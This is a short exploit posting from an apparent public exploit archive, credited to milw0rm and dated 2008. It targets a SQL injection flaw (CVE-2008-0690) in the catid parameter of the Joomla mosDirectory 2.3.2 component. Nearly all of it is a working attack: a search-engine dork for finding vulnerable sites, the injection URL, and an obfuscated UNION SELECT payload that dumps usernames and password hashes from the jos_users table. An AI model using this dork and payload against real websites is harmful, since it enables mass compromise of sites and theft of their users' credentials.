Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection



EKU-ID: 12994 CVE: OSVDB-41513;CVE-2008-0690 OSVDB-ID:
Author: GoLd_M Published: 2008-02-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# milw0rm.com [2008-02-03]